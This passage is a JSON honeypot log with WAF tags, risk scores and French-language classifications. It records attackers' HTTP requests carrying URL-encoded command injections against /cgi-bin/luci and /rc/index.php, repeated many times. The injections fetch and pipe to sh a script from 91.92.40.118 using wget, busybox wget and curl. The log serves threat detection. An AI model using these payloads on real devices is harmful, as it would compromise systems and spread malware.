\u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002244ffcf3c1f570df3dc4728f744986dc3\u0022, \u0022path_pattern_hash\u0022: \u0022433e044dd5893c3ac149081d90651f83\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60\u0022, \u0022query_string\u0022: \u0022cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60\u0022, \u0022query_string\u0022: \u0022cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:8\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022605aacc0c75fb03a54b9392ba668e404583c6ab8\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuos\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/w\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20w\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuos\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/w\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20w\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":280},{"id":11809377,"ip":"45.153.34.219","ts":"2026-07-14 02:18:15.000000","proto":"tcp","src_port":55384,"dst_port":82,"service":"http","classification":"lfi_path_traversal","waf_score":62,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022php\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00227e22b17fd10c899591a6e595d6e525197585beb9\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 279, \u0022payload_entropy\u0022: 5.098852496038134, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 65, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u00222e0667aca5d795361c92362c31625d1a0389cf5c\u0022, \u0022event_fingerprint\u0022: \u002251035f0512e009df1461fa7a20a3bf98b28eb303\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 140, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 65}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00223c07921424d4aada6c9847152339169d\u0022, \u0022path_pattern_hash\u0022: \u00229f01d15dbd2a6d5aaea97c773f4d76a0\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 65}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60\u0022, \u0022query_string\u0022: \u0022param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022lfi-14\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60\u0022, \u0022query_string\u0022: \u0022param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022lfi-14\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:82\u0022, \u0022payload_snippet\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002208a3f1d5b65c0cdd791ed74e24229d0c6a468238\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/w\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 65\/100 (\u00c9lev\u00e9) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 65}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 65, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/w\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: 